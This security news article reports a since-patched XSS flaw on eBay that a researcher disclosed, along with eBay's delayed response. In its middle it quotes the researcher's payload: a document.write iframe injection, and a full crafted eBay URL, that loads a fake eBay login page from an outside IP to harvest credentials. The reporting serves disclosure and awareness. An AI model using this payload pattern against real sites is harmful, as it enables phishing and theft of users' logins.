A XSS may have exposed users of the eBay website to phishing attacks

Pierluigi Paganini January 12, 2016

A security researchers reported a Cross-Site Scripting (XSS) vulnerability that may have exposed users of the eBay website to phishing attacks.

An independent security researcher, using the nickname MLT, reported last month a simple flaw affecting the eBay website exposed its customers to phishing attacks. An attacker can exploit the vulnerability to host a bogus phishing page on the eBay website attempting to steal users’ login credentials.

The researcher explained that anyone could have already exploited the critical flaw in the eBay website to target eBay users, millions customers login credentials may have been compromised.

“this blog post will highlight exactly how easy it is to exploit XSS vulnerabilites in large sites” MLT wrote in a blog post that describe the hack.

The flaw affected the URL parameter, the attacker was able to exploit a Cross-Site Scripting (XSS) vulnerability to inject a malicious iFrame on the legitimate eBay website. The code used by the researchers redirect visitors of eBay website to a phishing page hosted on a third-party server by using an eBay’s URL. This trick makes it impossible to detect the attack and the phishing page appeared as legitimate.

At this point the researcher a login page that is an exact replica of the eBay login page, the unique difference resided in the second portion of the URL crafted for the attack, but it was impossible to note it.

Below the code used to inject the iFrame containing the phishing page:

document.write(‘<iframec=”http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html&#8221; width=”1500″ height=”1000″>’) 

so the entire URL appears as:

http://ebay.com/link/?nav=webview&url=javascript:document.write%28%27%3Ciframe%20src=%22http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html%22%20width=%221500%22%20height=%221000%22%3E%27%29
ebay bogus login page xss flaw

eBay website bogus login page

Below the video PoC provided by the researcher:

https://youtu.be/WuZ61NWbK_4

MLT reported the flaw to eBay on December 11th, but after a first contact requesting more information, the eBay security team ignored him and did not fix the problem.

It seems that the situation changed after the media contacted eBay asking about the critical vulnerability.

“On Monday, MLT told Motherboard that the bug was patched, according to his tests. Later, eBay confirmed to Motherboard that the flaw was fixed, and that eBay would acknowledge MLT’s bug report on the site’s page dedicated to thanking friendly hackers who report issues on the site.” wrote Lorenzo Bicchierai on Motherboard.

eBay promptly release a security patch on Monday and acknowledged MLT found the flaw and added his name the list of thanks to the hackers that ethically reported the flaw to the company.

Pierluigi Paganini

(Security Affairs – eBay website, hacking)



you might also like

leave a comment